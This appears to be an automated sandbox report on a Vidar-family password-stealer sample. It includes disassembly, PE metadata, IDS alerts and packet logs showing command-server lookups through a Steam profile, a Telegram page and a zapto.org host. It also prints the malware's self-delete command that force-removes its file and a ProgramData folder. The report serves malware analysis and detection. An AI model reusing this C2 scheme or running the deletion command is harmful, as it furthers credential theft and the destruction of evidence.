                                    movzx esi, byte ptr [edx]
                                    mov dword ptr [ebp+00h], 00000000h
                                    mov dword ptr [esp+60h], 00000000h
                                    mov dword ptr [eax], 00000000h
                                    mov eax, 00000300h
                                    mov dword ptr [esp+64h], esi
                                    mov dword ptr [esp+5Ch], 00000001h
                                    mov dword ptr [esp+58h], 00000001h
                                    mov dword ptr [esp+54h], 00000001h
                                    mov dword ptr [esp+50h], 00000001h

                                    Rich Headers

                                    Programming Language:
                                    • [ASM] VS2010 build 30319
                                    • [ C ] VS2010 build 30319
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [C++] VS2010 build 30319
                                    • [LNK] VS2010 build 30319

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x2470b40x1e0.rsrc
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x2470000xb4.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x2472940xc.rsrc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    UPX00x10000x2350000x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    UPX10x2360000x110000x10a00de6d77a2d892ec4ed99e2d6491aa7108False0.981687617481203ARC archive data, packed7.984077126914227IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x2470000x10000x400d1aec6795c1635e90fcb815e6185fd41False0.3818359375data3.115785366842726IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_MANIFEST0x24705c0x56ASCII text, with CRLF line terminatorsEnglishUnited States1.0232558139534884

                                    Imports

                                    DLLImport
                                    ADVAPI32.dllGetUserNameA
                                    KERNEL32.DLLLoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
                                    msvcrt.dllrand
                                    ole32.dllCoInitializeEx
                                    OLEAUT32.dllSysFreeString
                                    SHELL32.dllSHFileOperationA
                                    SHLWAPI.dll
                                    USER32.dllwsprintfW

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-09-15T18:30:02.915417+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.1249718188.245.87.202443TCP

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Sep 15, 2024 18:29:57.743235111 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:57.743274927 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:57.743494987 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:57.775052071 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:57.775077105 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:58.437298059 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:58.437464952 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:58.864470005 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:58.864495039 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:58.865560055 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:58.865653992 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:59.034697056 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:59.079396009 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:59.429142952 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:59.429176092 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:59.429234982 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:59.429296017 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:59.429323912 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:59.429342985 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:59.429403067 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:59.518125057 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:59.518204927 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:59.518294096 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:59.518311977 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:59.518335104 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:59.518431902 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:59.534771919 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:59.534871101 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:59.534888029 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:59.534945011 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:59.534945011 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:59.535711050 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:59.535728931 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:59.547319889 CEST49718443192.168.2.12188.245.87.202
                                    Sep 15, 2024 18:29:59.547369003 CEST44349718188.245.87.202192.168.2.12
                                    Sep 15, 2024 18:29:59.547467947 CEST49718443192.168.2.12188.245.87.202
                                    Sep 15, 2024 18:29:59.547810078 CEST49718443192.168.2.12188.245.87.202
                                    Sep 15, 2024 18:29:59.547827005 CEST44349718188.245.87.202192.168.2.12
                                    Sep 15, 2024 18:30:02.915318966 CEST44349718188.245.87.202192.168.2.12
                                    Sep 15, 2024 18:30:02.915416956 CEST49718443192.168.2.12188.245.87.202
                                    Sep 15, 2024 18:30:02.916088104 CEST49718443192.168.2.12188.245.87.202
                                    Sep 15, 2024 18:30:02.916107893 CEST44349718188.245.87.202192.168.2.12
                                    Sep 15, 2024 18:30:02.916914940 CEST49719443192.168.2.12188.245.87.202
                                    Sep 15, 2024 18:30:02.916970015 CEST44349719188.245.87.202192.168.2.12
                                    Sep 15, 2024 18:30:02.917057037 CEST49719443192.168.2.12188.245.87.202
                                    Sep 15, 2024 18:30:02.917320013 CEST49719443192.168.2.12188.245.87.202
                                    Sep 15, 2024 18:30:02.917332888 CEST44349719188.245.87.202192.168.2.12
                                    Sep 15, 2024 18:30:06.276719093 CEST44349719188.245.87.202192.168.2.12
                                    Sep 15, 2024 18:30:06.276830912 CEST49719443192.168.2.12188.245.87.202
                                    Sep 15, 2024 18:30:06.276920080 CEST49719443192.168.2.12188.245.87.202
                                    Sep 15, 2024 18:30:06.276948929 CEST44349719188.245.87.202192.168.2.12
                                    Sep 15, 2024 18:30:06.277506113 CEST49720443192.168.2.12188.245.87.202
                                    Sep 15, 2024 18:30:06.277548075 CEST44349720188.245.87.202192.168.2.12
                                    Sep 15, 2024 18:30:06.277621031 CEST49720443192.168.2.12188.245.87.202
                                    Sep 15, 2024 18:30:06.277736902 CEST49720443192.168.2.12188.245.87.202
                                    Sep 15, 2024 18:30:06.277779102 CEST44349720188.245.87.202192.168.2.12
                                    Sep 15, 2024 18:30:06.277825117 CEST49720443192.168.2.12188.245.87.202
                                    Sep 15, 2024 18:30:06.291809082 CEST49721443192.168.2.12149.154.167.99
                                    Sep 15, 2024 18:30:06.291845083 CEST44349721149.154.167.99192.168.2.12
                                    Sep 15, 2024 18:30:06.291908979 CEST49721443192.168.2.12149.154.167.99
                                    Sep 15, 2024 18:30:06.292139053 CEST49721443192.168.2.12149.154.167.99
                                    Sep 15, 2024 18:30:06.292152882 CEST44349721149.154.167.99192.168.2.12
                                    Sep 15, 2024 18:30:06.920351982 CEST44349721149.154.167.99192.168.2.12
                                    Sep 15, 2024 18:30:06.920496941 CEST49721443192.168.2.12149.154.167.99
                                    Sep 15, 2024 18:30:06.927598000 CEST49721443192.168.2.12149.154.167.99
                                    Sep 15, 2024 18:30:06.927623034 CEST44349721149.154.167.99192.168.2.12
                                    Sep 15, 2024 18:30:06.927894115 CEST44349721149.154.167.99192.168.2.12
                                    Sep 15, 2024 18:30:06.927961111 CEST49721443192.168.2.12149.154.167.99
                                    Sep 15, 2024 18:30:06.928375006 CEST49721443192.168.2.12149.154.167.99
                                    Sep 15, 2024 18:30:06.975398064 CEST44349721149.154.167.99192.168.2.12
                                    Sep 15, 2024 18:30:07.170530081 CEST44349721149.154.167.99192.168.2.12
                                    Sep 15, 2024 18:30:07.170557022 CEST44349721149.154.167.99192.168.2.12
                                    Sep 15, 2024 18:30:07.170587063 CEST44349721149.154.167.99192.168.2.12
                                    Sep 15, 2024 18:30:07.170609951 CEST49721443192.168.2.12149.154.167.99
                                    Sep 15, 2024 18:30:07.170612097 CEST44349721149.154.167.99192.168.2.12
                                    Sep 15, 2024 18:30:07.170670986 CEST49721443192.168.2.12149.154.167.99
                                    Sep 15, 2024 18:30:07.170705080 CEST49721443192.168.2.12149.154.167.99
                                    Sep 15, 2024 18:30:07.173254013 CEST49721443192.168.2.12149.154.167.99
                                    Sep 15, 2024 18:30:07.173265934 CEST44349721149.154.167.99192.168.2.12

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Sep 15, 2024 18:29:57.728355885 CEST5308953192.168.2.121.1.1.1
                                    Sep 15, 2024 18:29:57.737616062 CEST53530891.1.1.1192.168.2.12
                                    Sep 15, 2024 18:30:06.280889034 CEST5265253192.168.2.121.1.1.1
                                    Sep 15, 2024 18:30:06.291100025 CEST53526521.1.1.1192.168.2.12
                                    Sep 15, 2024 18:30:08.098771095 CEST5964353192.168.2.121.1.1.1
                                    Sep 15, 2024 18:30:08.108323097 CEST53596431.1.1.1192.168.2.12

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Sep 15, 2024 18:29:57.728355885 CEST192.168.2.121.1.1.10xba99Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                    Sep 15, 2024 18:30:06.280889034 CEST192.168.2.121.1.1.10xc0edStandard query (0)t.meA (IP address)IN (0x0001)false
                                    Sep 15, 2024 18:30:08.098771095 CEST192.168.2.121.1.1.10xd26fStandard query (0)arpdabl.zapto.orgA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Sep 15, 2024 18:29:57.737616062 CEST1.1.1.1192.168.2.120xba99No error (0)steamcommunity.com23.50.98.133A (IP address)IN (0x0001)false
                                    Sep 15, 2024 18:30:06.291100025 CEST1.1.1.1192.168.2.120xc0edNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                    Sep 15, 2024 18:30:08.108323097 CEST1.1.1.1192.168.2.120xd26fNo error (0)arpdabl.zapto.org0.0.0.0A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • steamcommunity.com
                                    • t.me

                                    HTTPS Proxied Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.124971723.50.98.1334436924C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe
                                    TimestampBytes transferredDirectionData
                                    2024-09-15 16:29:59 UTC119OUTGET /profiles/76561199747278259 HTTP/1.1
                                    Host: steamcommunity.com
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    2024-09-15 16:29:59 UTC1870INHTTP/1.1 200 OK
                                    Server: nginx
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                    Cache-Control: no-cache
                                    Date: Sun, 15 Sep 2024 16:29:59 GMT
                                    Content-Length: 34740
                                    Connection: close
                                    Set-Cookie: sessionid=2e963e6cf61507d182db9691; Path=/; Secure; SameSite=None
                                    Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                    2024-09-15 16:29:59 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                    2024-09-15 16:29:59 UTC10062INData Raw: 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69
                                    Data Ascii: destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><di
                                    2024-09-15 16:29:59 UTC10164INData Raw: 6d 6d 75 6e 69 74 79 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 61 73 73 65 74 73 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45
                                    Data Ascii: mmunity.akamai.steamstatic.com\/&quot;,&quot;COMMUNITY_CDN_ASSET_URL&quot;:&quot;https:\/\/cdn.akamai.steamstatic.com\/steamcommunity\/public\/assets\/&quot;,&quot;STORE_CDN_URL&quot;:&quot;https:\/\/store.akamai.steamstatic.com\/&quot;,&quot;PUBLIC_SHARE


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.1249721149.154.167.994436924C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe
                                    TimestampBytes transferredDirectionData
                                    2024-09-15 16:30:06 UTC86OUTGET /armad2a HTTP/1.1
                                    Host: t.me
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    2024-09-15 16:30:07 UTC510INHTTP/1.1 200 OK
                                    Server: nginx/1.18.0
                                    Date: Sun, 15 Sep 2024 16:30:07 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Content-Length: 9552
                                    Connection: close
                                    Set-Cookie: stel_ssid=4efd914e132e45a65a_1135532237225000423; expires=Mon, 16 Sep 2024 16:30:07 GMT; path=/; samesite=None; secure; HttpOnly
                                    Pragma: no-cache
                                    Cache-control: no-store
                                    X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                    Content-Security-Policy: frame-ancestors https://web.telegram.org
                                    Strict-Transport-Security: max-age=35768000
                                    2024-09-15 16:30:07 UTC9552INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 61 72 6d 61 64 32 61 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e
                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @armad2a</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:12:29:56
                                    Start date:15/09/2024
                                    Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe"
                                    Imagebase:0x2f0000
                                    File size:70'144 bytes
                                    MD5 hash:5A4CCCCB90B0AAA3B248D4F0DDE38823
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:3
                                    Start time:12:30:07
                                    Start date:15/09/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe" & rd /s /q "C:\ProgramData\AEGHIJEHJDHI" & exit
                                    Imagebase:0x1f0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:4
                                    Start time:12:30:07
                                    Start date:15/09/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff704000000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:5
                                    Start time:12:30:07
                                    Start date:15/09/2024
                                    Path:C:\Windows\SysWOW64\timeout.exe
                                    Wow64 process (32bit):true
                                    Commandline:timeout /t 10
                                    Imagebase:0xfe0000
                                    File size:25'088 bytes
                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:18%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:7.6%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:40
                                      execution_graph 14764 300630 CoCreateInstance 14765 3006e6 14764->14765 14766 300677 SysAllocString 14764->14766 14766->14765 14768 300687 14766->14768 14767 3006df SysFreeString 14767->14765 14768->14767 14769 3006b6 _wtoi64 SysFreeString 14768->14769 14769->14767 14770 3075f0 14795 2f2180 14770->14795 14778 307612 14895 2ff9a0 lstrlen 14778->14895 14781 2ff9a0 3 API calls 14782 30763a 14781->14782 14783 2ff9a0 3 API calls 14782->14783 14784 307641 14783->14784 14899 2ff8f0 14784->14899 14786 30764a 14787 30766a OpenEventA 14786->14787 14788 3076a1 14787->14788 14789 30767c 14787->14789 14791 3076aa CreateEventA 14788->14791 14790 307680 CloseHandle 14789->14790 14792 30768f OpenEventA 14789->14792 14790->14789 14903 306510 14791->14903 14792->14788 14792->14790 15286 2f2000 17 API calls 14795->15286 14797 2f2191 14798 2f2000 39 API calls 14797->14798 14799 2f21a7 14798->14799 14800 2f2000 39 API calls 14799->14800 14801 2f21bd 14800->14801 14802 2f2000 39 API calls 14801->14802 14803 2f21d3 14802->14803 14804 2f2000 39 API calls 14803->14804 14805 2f21e9 14804->14805 14806 2f2000 39 API calls 14805->14806 14807 2f21ff 14806->14807 14808 2f2000 39 API calls 14807->14808 14809 2f2218 14808->14809 14810 2f2000 39 API calls 14809->14810 14811 2f222e 14810->14811 14812 2f2000 39 API calls 14811->14812 14813 2f2244 14812->14813 14814 2f2000 39 API calls 14813->14814 14815 2f225a 14814->14815 14816 2f2000 39 API calls 14815->14816 14817 2f2270 14816->14817 14818 2f2000 39 API calls 14817->14818 14819 2f2286 14818->14819 14820 2f2000 39 API calls 14819->14820 14821 2f229f 14820->14821 14822 2f2000 39 API calls 14821->14822 14823 2f22b5 14822->14823 14824 2f2000 39 API calls 14823->14824 14825 2f22cb 14824->14825 14826 2f2000 39 API calls 14825->14826 14827 2f22e1 14826->14827 14828 2f2000 39 API calls 14827->14828 14829 2f22f7 14828->14829 14830 2f2000 39 API calls 14829->14830 14831 2f230d 14830->14831 14832 2f2000 39 API calls 14831->14832 14833 2f2326 14832->14833 14834 2f2000 39 API calls 14833->14834 14835 2f233c 14834->14835 14836 2f2000 39 API calls 14835->14836 14837 2f2352 14836->14837 14838 2f2000 39 API calls 14837->14838 14839 2f2368 14838->14839 14840 2f2000 39 API calls 14839->14840 14841 2f237e 14840->14841 14842 2f2000 39 API calls 14841->14842 14843 2f2394 14842->14843 14844 2f2000 39 API calls 14843->14844 14845 2f23ad 14844->14845 14846 2f2000 39 API calls 14845->14846 14847 2f23c3 14846->14847 14848 2f2000 39 API calls 14847->14848 14849 2f23d9 14848->14849 14850 2f2000 39 API calls 14849->14850 14851 2f23ef 14850->14851 14852 2f2000 39 API calls 14851->14852 14853 2f2405 14852->14853 14854 2f2000 39 API calls 14853->14854 14855 2f241b 14854->14855 14856 2f2000 39 API calls 14855->14856 14857 2f2434 14856->14857 14858 2f2000 39 API calls 14857->14858 14859 2f244a 14858->14859 14860 2f2000 39 API calls 14859->14860 14861 2f2460 14860->14861 14862 2f2000 39 API calls 14861->14862 14863 2f2476 14862->14863 14864 2f2000 39 API calls 14863->14864 14865 2f248c 14864->14865 14866 2f2000 39 API calls 14865->14866 14867 2f24a2 14866->14867 14868 2f2000 39 API calls 14867->14868 14869 2f24bb 14868->14869 14870 2f2000 39 API calls 14869->14870 14871 2f24d1 14870->14871 14872 2f2000 39 API calls 14871->14872 14873 2f24e7 14872->14873 14874 2f2000 39 API calls 14873->14874 14875 2f24fd 14874->14875 14876 3076e0 GetPEB 14875->14876 14877 307711 14876->14877 14878 307922 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 14876->14878 14887 307736 20 API calls 14877->14887 14879 307983 GetProcAddress 14878->14879 14880 307996 14878->14880 14879->14880 14881 3079ca 14880->14881 14882 30799f GetProcAddress GetProcAddress 14880->14882 14883 3079d3 GetProcAddress 14881->14883 14884 3079e6 14881->14884 14882->14881 14883->14884 14885 307a02 14884->14885 14886 3079ef GetProcAddress 14884->14886 14888 307600 14885->14888 14889 307a0b GetProcAddress GetProcAddress 14885->14889 14886->14885 14887->14878 14890 2ff810 14888->14890 14889->14888 14891 2ff820 14890->14891 14892 2ff83f 14891->14892 14893 2ff837 lstrcpy 14891->14893 14894 2ffae0 GetProcessHeap RtlAllocateHeap GetUserNameA 14892->14894 14893->14892 14894->14778 14896 2ff9cc 14895->14896 14897 2ff9f1 14896->14897 14898 2ff9df lstrcpy lstrcat 14896->14898 14897->14781 14898->14897 14900 2ff906 14899->14900 14901 2ff936 14900->14901 14902 2ff92e lstrcpy 14900->14902 14901->14786 14902->14901 14904 30651d 14903->14904 14905 2ff810 lstrcpy 14904->14905 14906 306530 14905->14906 15290 2ff8a0 lstrlen 14906->15290 14909 2ff8a0 2 API calls 14910 306594 14909->14910 15294 2f2510 14910->15294 14914 3066e1 14915 2ff810 lstrcpy 14914->14915 15082 306980 14914->15082 14917 3066fb 14915->14917 14919 2ff9a0 3 API calls 14917->14919 14918 3069a5 14920 2ff8f0 lstrcpy 14918->14920 14921 30670c 14919->14921 14922 3069b1 14920->14922 14923 2ff8f0 lstrcpy 14921->14923 14925 2ff810 lstrcpy 14922->14925 14924 306715 14923->14924 14928 2ff9a0 3 API calls 14924->14928 14926 3069c9 14925->14926 14927 2ff9a0 3 API calls 14926->14927 